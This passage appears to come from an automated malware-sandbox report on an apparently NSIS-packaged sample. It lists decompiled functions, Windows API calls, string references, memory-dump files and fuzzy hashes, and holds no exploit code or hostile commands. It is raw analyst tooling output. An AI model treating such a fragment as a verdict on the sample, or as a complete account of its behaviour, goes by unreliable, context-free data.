                                                                                                                                                                                                                                                                control_flow_graph 463 403fc8-403fd8 464 4040ea-4040fd 463->464 465 403fde-403fe6 463->465 468 404159-40415d 464->468 469 4040ff-404108 464->469 466 403fe8-403ff7 465->466 467 403ff9-404091 call 403e7f * 2 CheckDlgButton call 403ea1 GetDlgItem call 403eb4 SendMessageA 465->467 466->467 501 404093-404096 GetSysColor 467->501 502 40409c-4040e5 SendMessageA * 2 lstrlenA SendMessageA * 2 467->502 471 404163-404177 GetDlgItem 468->471 472 40422d-404234 468->472 473 40423c 469->473 474 40410e-404116 469->474 479 404179-404180 471->479 480 4041eb-4041f2 471->480 472->473 476 404236 472->476 478 40423f-404246 call 403ee6 473->478 474->473 475 40411c-404128 474->475 475->473 481 40412e-404154 GetDlgItem SendMessageA call 403ea1 call 404252 475->481 476->473 488 40424b-40424f 478->488 479->480 484 404182-40419d 479->484 480->478 485 4041f4-4041fb 480->485 481->468 484->480 489 40419f-4041e8 SendMessageA LoadCursorA SetCursor ShellExecuteA LoadCursorA SetCursor 484->489 485->478 490 4041fd-404201 485->490 489->480 493 404203-404212 SendMessageA 490->493 494 404214-404218 490->494 493->494 497 404228-40422b 494->497 498 40421a-404226 SendMessageA 494->498 497->488 498->497 501->502 502->488
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404053
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(00000000,000003E8), ref: 00404067
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404085
                                                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 00404096
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004040A5
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004040B4
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 004040B7
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040C6
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040DB
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 0040413D
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000), ref: 00404140
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040416B
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004041AB
                                                                                                                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F02), ref: 004041BA
                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004041C3
                                                                                                                                                                                                                                                                • ShellExecuteA.SHELL32(0000070B,open,0042D340,00000000,00000000,00000001), ref: 004041D6
                                                                                                                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 004041E3
                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004041E6
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404212
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404226
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                                                                                                                                                • String ID: N$open
                                                                                                                                                                                                                                                                • API String ID: 3615053054-904208323
                                                                                                                                                                                                                                                                • Opcode ID: bd37493bba8a7160a5fbdbedca7196346d7bbe886d3872d1f711f9678ebaf451
                                                                                                                                                                                                                                                                • Instruction ID: 4a720cbc7ced66984b2347167a4dd5be7871a0de437cfd71c5777b4804bda38e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd37493bba8a7160a5fbdbedca7196346d7bbe886d3872d1f711f9678ebaf451
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA61C2B1A40209BFEB109F61CC45F6A7B69FB84701F10407AFB00BA2D1C7B8A951CF99
                                                                                                                                                                                                                                                                Function 004058C9 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 680 4058c9-4058f0 lstrcpyA 681 4058f2-40590a call 405822 CloseHandle GetShortPathNameA 680->681 682 405918-405927 GetShortPathNameA 680->682 684 405a3f-405a44 681->684 689 405910-405912 681->689 683 40592d-40592f 682->683 682->684 683->684 686 405935-405973 wsprintfA call 405bb3 call 405822 683->686 686->684 693 405979-405995 GetFileSize GlobalAlloc 686->693 689->682 689->684 694 405a38-405a39 CloseHandle 693->694 695 40599b-4059a5 call 40589a 693->695 694->684 695->694 698 4059ab-4059b8 call 405787 695->698 701 4059ba-4059cc lstrcpyA 698->701 702 4059ce-4059e0 call 405787 698->702 703 405a03 701->703 707 4059e2-4059e8 702->707 708 4059ff 702->708 706 405a05-405a32 call 4057dd SetFilePointer WriteFile GlobalFree 703->706 706->694 710 4059f0-4059f2 707->710 708->703 712 4059f4-4059fd 710->712 713 4059ea-4059ef 710->713 712->706 713->710
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(0042B5B0,NUL,?,00000000,?,00000000,?,00405A6D,?,?,00000001,00405610,?,00000000,000000F1,?), ref: 004058D9
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405A6D,?,?,00000001,00405610,?,00000000,000000F1,?), ref: 004058FD
                                                                                                                                                                                                                                                                • GetShortPathNameA.KERNEL32(00000000,0042B5B0,00000400), ref: 00405906
                                                                                                                                                                                                                                                                  • Part of subcall function 00405787: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004059B6,00000000,[Rename],00000000,00000000,00000000), ref: 00405797
                                                                                                                                                                                                                                                                  • Part of subcall function 00405787: lstrlenA.KERNEL32(004059B6,?,00000000,004059B6,00000000,[Rename],00000000,00000000,00000000), ref: 004057C9
                                                                                                                                                                                                                                                                • GetShortPathNameA.KERNEL32(?,0042B9B0,00000400), ref: 00405923
                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00405941
                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,0042B9B0,C0000000,00000004,0042B9B0,?,?,?,?,?), ref: 0040597C
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 0040598B
                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004059C3
                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,0042B1B0,00000000,-0000000A,0040936C,00000000,[Rename],00000000,00000000,00000000), ref: 00405A19
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405A2B
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00405A32
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405A39
                                                                                                                                                                                                                                                                  • Part of subcall function 00405822: GetFileAttributesA.KERNEL32(00000003,00402C69,00435C00,80000000,00000003), ref: 00405826
                                                                                                                                                                                                                                                                  • Part of subcall function 00405822: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405848
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                                                                                                                                                                                • String ID: %s=%s$NUL$[Rename]
                                                                                                                                                                                                                                                                • API String ID: 1265525490-4148678300
                                                                                                                                                                                                                                                                • Opcode ID: 327445c9d1c9927783c3f3457bb2a4ab25aba66808bf47e8d04e43f3f6866f7b
                                                                                                                                                                                                                                                                • Instruction ID: a7ae131883122c305ebb5a94e4791e7dc74bc152dd9dfe90db1d6281d1838ee4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 327445c9d1c9927783c3f3457bb2a4ab25aba66808bf47e8d04e43f3f6866f7b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE41EF71A05A55AFD3206B215C89F6B3A5CEB45758F14053ABE02B22D2DA7CAC018EBD
                                                                                                                                                                                                                                                                Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                                                                • DrawTextA.USER32(00000000,0042DBA0,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                • String ID: F
                                                                                                                                                                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                • Opcode ID: 91a2245b94a8841dbbb3e7c6d70d151623849c123f413ff1f54cc8de7c044c5d
                                                                                                                                                                                                                                                                • Instruction ID: 56390ffcd2b5ebfb5c65d4f338f2fcdd02e5d2b15fd4a6b60b61e3d9fa1f9be4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91a2245b94a8841dbbb3e7c6d70d151623849c123f413ff1f54cc8de7c044c5d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E418971804249AFCB058F95DD459AFBBB9FF44311F00812AF962AA1A0C738EA51DFA5
                                                                                                                                                                                                                                                                Function 004042BD Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 268stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 1239 4042bd-4042e7 1240 4042e9-4042f5 call 405389 call 405dfc 1239->1240 1241 4042fa-404304 1239->1241 1240->1241 1242 404372-404379 1241->1242 1243 404306-40431c GetDlgItem call 40568e 1241->1243 1247 404450-404457 1242->1247 1248 40437f-404388 1242->1248 1255 40432e-404367 SetWindowTextA call 403e7f * 2 call 403eb4 call 405ebc 1243->1255 1256 40431e-404326 call 4056ba 1243->1256 1253 404466-404481 call 405389 call 40570f 1247->1253 1254 404459-404460 1247->1254 1251 4043a2-4043a7 1248->1251 1252 40438a-404395 1248->1252 1251->1247 1259 4043ad-4043ef call 405bb3 SHBrowseForFolderA 1251->1259 1257 4045ea-4045fc call 403ee6 1252->1257 1258 40439b 1252->1258 1279 404483 1253->1279 1280 40448a-4044a3 call 405b91 call 405ebc 1253->1280 1254->1253 1254->1257 1255->1257 1294 40436d-40436f 1255->1294 1256->1255 1271 404328-404329 call 405621 1256->1271 1258->1251 1273 4043f1-40440b CoTaskMemFree call 405621 1259->1273 1274 404449 1259->1274 1271->1255 1285 404435-404447 SetDlgItemTextA 1273->1285 1286 40440d-404413 1273->1286 1274->1247 1279->1280 1296 4044a5-4044a9 1280->1296 1297 4044d8-4044e7 call 405b91 call 4056ba 1280->1297 1285->1247 1286->1285 1289 404415-40442c call 405bb3 lstrcmpiA 1286->1289 1289->1285 1298 40442e-404430 lstrcatA 1289->1298 1294->1242 1296->1297 1299 4044ab-4044bd 1296->1299 1307 4044e9 1297->1307 1308 4044ec-404505 GetDiskFreeSpaceA 1297->1308 1298->1285 1305 404529-40454a 1299->1305 1306 4044bf-4044c1 1299->1306 1309 40454f 1305->1309 1310 4044c3 1306->1310 1311 4044c5-4044d6 call 405668 1306->1311 1307->1308 1312 404507-404527 MulDiv 1308->1312 1313 40454c 1308->1313 1314 404554-404560 call 40471a 1309->1314 1310->1311 1311->1297 1311->1299 1312->1314 1313->1309 1319 404562-404564 1314->1319 1320 40456d-404576 1314->1320 1319->1320 1321 404566 1319->1321 1322 4045a3-4045ad 1320->1322 1323 404578-404588 call 404665 1320->1323 1321->1320 1325 4045b9-4045bf 1322->1325 1326 4045af-4045b6 call 40140b 1322->1326 1331 404595-40459e SetDlgItemTextA 1323->1331 1332 40458a-404593 call 404665 1323->1332 1329 4045c1 1325->1329 1330 4045c4-4045d5 call 403ea1 1325->1330 1326->1325 1329->1330 1338 4045e4 1330->1338 1339 4045d7-4045dd 1330->1339 1331->1322 1332->1322 1338->1257 1339->1338 1340 4045df call 404252 1339->1340 1340->1338
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 0040430C
                                                                                                                                                                                                                                                                • SetWindowTextA.USER32(00000000,?), ref: 00404336
                                                                                                                                                                                                                                                                • SHBrowseForFolderA.SHELL32(?,00428BF8,?), ref: 004043E7
                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 004043F2
                                                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(0042D340,00429820), ref: 00404424
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,0042D340), ref: 00404430
                                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404442
                                                                                                                                                                                                                                                                  • Part of subcall function 00405389: GetDlgItemTextA.USER32(?,?,00000400,00404479), ref: 0040539C
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DFC: CharNextA.USER32(?,*?|<>/":,00000000,00434000,00435400,00435400,00000000,004030BA,00435400,756A3410,00403294), ref: 00405E54
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DFC: CharNextA.USER32(?,?,?,00000000), ref: 00405E61
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DFC: CharNextA.USER32(?,00434000,00435400,00435400,00000000,004030BA,00435400,756A3410,00403294), ref: 00405E66
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DFC: CharPrevA.USER32(?,?,00435400,00435400,00000000,004030BA,00435400,756A3410,00403294), ref: 00405E76
                                                                                                                                                                                                                                                                • GetDiskFreeSpaceA.KERNEL32(004287F0,?,?,0000040F,?,004287F0,004287F0,?,00000000,004287F0,?,?,000003FB,?), ref: 004044FD
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404518
                                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(00000000,00000400,004287E0), ref: 0040459E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                                                                                                                                                                                • String ID: A
                                                                                                                                                                                                                                                                • API String ID: 2246997448-3554254475
                                                                                                                                                                                                                                                                • Opcode ID: b3b7e376e707d9eda9690b5ceb933977ae0e1f069ee966c462b3593b74f8338b
                                                                                                                                                                                                                                                                • Instruction ID: 21907f09a7f0adac02db5a20439709df020a6e4e4535a3db2c95f33fac12625f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3b7e376e707d9eda9690b5ceb933977ae0e1f069ee966c462b3593b74f8338b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 039171B1900219BBDB11AFA1CC85BAF77B8EF84314F10447BFA04B62C1D77C9A418B69
                                                                                                                                                                                                                                                                Function 00405BB3 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 199stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetVersion.KERNEL32(?,00429000,00000000,00404EB4,00429000,00000000), ref: 00405C64
                                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32(0042D340,00000400), ref: 00405CDF
                                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(0042D340,00000400), ref: 00405CF2
                                                                                                                                                                                                                                                                • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405D2E
                                                                                                                                                                                                                                                                • SHGetPathFromIDListA.SHELL32(?,0042D340), ref: 00405D3C
                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(?), ref: 00405D47
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(0042D340,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D69
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(0042D340,?,00429000,00000000,00404EB4,00429000,00000000), ref: 00405DBB
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00405D63
                                                                                                                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion, xrefs: 00405CAE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                • API String ID: 900638850-730719616
                                                                                                                                                                                                                                                                • Opcode ID: f67fc36d875180e0be9eee5385700d9ad82d05813cf02bda3c13f2274c01b590
                                                                                                                                                                                                                                                                • Instruction ID: 03bbcc83ae8db2cba80ea7df372ba0a8a6f53f324bd5ae32260a6f1a1bd8d9a5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f67fc36d875180e0be9eee5385700d9ad82d05813cf02bda3c13f2274c01b590
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E61F271A04A05AEEF215B65CC88BBF3BA5DF11704F20813BE901B62D1D27D5882DF5E
                                                                                                                                                                                                                                                                Function 00402C29 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402C3A
                                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00435C00,00000400), ref: 00402C56
                                                                                                                                                                                                                                                                  • Part of subcall function 00405822: GetFileAttributesA.KERNEL32(00000003,00402C69,00435C00,80000000,00000003), ref: 00405826
                                                                                                                                                                                                                                                                  • Part of subcall function 00405822: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405848
                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,00434C00,00434C00,00435C00,00435C00,80000000,00000003), ref: 00402CA2
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Error launching installer, xrefs: 00402C79
                                                                                                                                                                                                                                                                • soft, xrefs: 00402D17
                                                                                                                                                                                                                                                                • Inst, xrefs: 00402D0E
                                                                                                                                                                                                                                                                • Null, xrefs: 00402D20
                                                                                                                                                                                                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E01
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                                                                                                                                                                • API String ID: 4283519449-1074636621
                                                                                                                                                                                                                                                                • Opcode ID: 737df57802bde90b1dd81f9f9cbaf29b7d289456ab0cf199b5c66e23c5e8ffc4
                                                                                                                                                                                                                                                                • Instruction ID: c80feb63f856711914d44cd07d0e36175ef9d189e1e49feff23a0d5b70f6312c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 737df57802bde90b1dd81f9f9cbaf29b7d289456ab0cf199b5c66e23c5e8ffc4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB51D331A00214ABDB209F65DE89B9E7AB4AB04719F10413BF905B72D1D7BC9D818BAD
                                                                                                                                                                                                                                                                Function 339DA1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: HEAP:
                                                                                                                                                                                                                                                                • API String ID: 3446177414-2466845122
                                                                                                                                                                                                                                                                • Opcode ID: 915663368170c6debb51f04dc9acde7cbfd44a7c79be637b91f9ba5f877e766f
                                                                                                                                                                                                                                                                • Instruction ID: fbb1859042b6f53be2c0bd65957422cbc4bb2387cf054a70bfe35b4fc13fcb4a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 915663368170c6debb51f04dc9acde7cbfd44a7c79be637b91f9ba5f877e766f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99A19A75A08312CFD714DE28C895A1AB7EAFF88390F18852DE945DB310EB70EC55CB91
                                                                                                                                                                                                                                                                Function 33937550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • ExecuteOptions, xrefs: 339744AB
                                                                                                                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 33974507
                                                                                                                                                                                                                                                                • Execute=1, xrefs: 3397451E
                                                                                                                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 33974530
                                                                                                                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 33974592
                                                                                                                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 33974460
                                                                                                                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3397454D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
